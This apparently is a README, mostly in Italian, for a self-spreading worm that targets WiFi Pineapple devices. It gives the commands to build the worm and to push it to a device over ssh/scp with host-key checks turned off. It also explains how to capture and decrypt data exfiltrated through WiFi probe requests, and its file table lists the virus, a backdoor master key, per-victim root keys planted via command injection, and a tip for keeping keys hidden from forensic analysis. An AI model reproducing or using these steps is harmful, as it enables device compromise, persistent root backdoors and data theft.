
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: dovrai avere un dispositivo configurato OPPURE usare il metasploit-module per abilitare ssh
il filtro wireshark è:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
In alternativa, usa lo script harvest.py in questo modo:
python harvest.py [monitor-iface]
| File | Purpose |
|---|---|
| tv | Il virus stesso. |
| tvbd | La chiave backdoor "master", non distribuire la chiave privata. |
| tvd | La chiave di divulgazione, usata per esfiltrare dati tramite probe request. |
| tospo_rsa | La chiave privata di identità, specifica per ogni dispositivo infetto, usata come chiave di trasferimento. |
| tospo_rsa.pub | La chiave pubblica di identità, trasferita tramite la pagina di command injection per consentire all'identità privata di eseguire azioni come root sul dispositivo remoto. |
| w | Opzioni di configurazione wireless inviate, usate per ripristinare le connessioni precedenti. |
| n | Opzioni di configurazione di rete inviate, usate per ripristinare le connessioni precedenti. |
| Nota: I file che iniziano con 'tv' vengono tutti trasferiti quando si infetta un nuovo dispositivo. Non aggiungere chiavi private o simili usando nomi che iniziano con 'tv', altrimenti la tua chiave privata sarà esposta all'analisi forense. |